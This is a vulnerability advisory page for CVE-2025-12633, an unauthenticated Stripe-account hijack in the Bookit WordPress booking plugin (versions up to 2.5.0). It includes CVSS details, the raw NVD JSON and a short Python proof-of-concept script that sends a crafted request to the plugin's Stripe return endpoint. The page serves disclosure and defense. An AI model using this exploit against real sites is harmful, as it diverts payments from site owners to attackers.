Security Vulnerability Report
中文
CVE-2025-12633 CVSS 7.5 HIGH

CVE-2025-12633

Published: 2025-11-12 08:15:41
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Booking Calendar | Appointment Booking | Bookit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/bookit/v1/commerce/stripe/return' REST API Endpoint in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to connect their Stripe account and receive payments.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Bookit插件 <= 2.5.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-12633 PoC - Unauthenticated Stripe Account Connection # Target: WordPress site with Bookit plugin <= 2.5.0 target_url = "https://vulnerable-site.com" api_endpoint = "/wp-json/bookit/v1/commerce/stripe/return" # Malicious Stripe Connect account ID (attacker controlled) malicious_stripe_account = "acct_1234567890abcdef" # Construct the malicious request params = { "stripe_account_id": malicious_stripe_account, "code": "ac_xxxxxxxxxxxxx", # Malicious authorization code "state": "bookit_stripe_connect" } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-12633-PoC)" } # Send unauthenticated request to exploit the vulnerability response = requests.get( f"{target_url}{api_endpoint}", params=params, headers=headers, verify=False ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: print("[+] Exploit successful - Stripe account linked") else: print("[-] Exploit failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12633", "sourceIdentifier": "[email protected]", "published": "2025-11-12T08:15:41.073", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Booking Calendar | Appointment Booking | Bookit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/bookit/v1/commerce/stripe/return' REST API Endpoint in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to connect their Stripe account and receive payments."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3393159/bookit/tags/2.5.1/src/Bookit/Gateways/StripeConnect/REST/Return_Endpoint.php?old=3121677&old_path=bookit%2Ftags%2F2.5.0%2Fsrc%2FBookit%2FGateways%2FStripeConnect%2FREST%2FReturn_Endpoint.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2263d356-b2ed-4e16-98ee-b01d4274d1d9?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.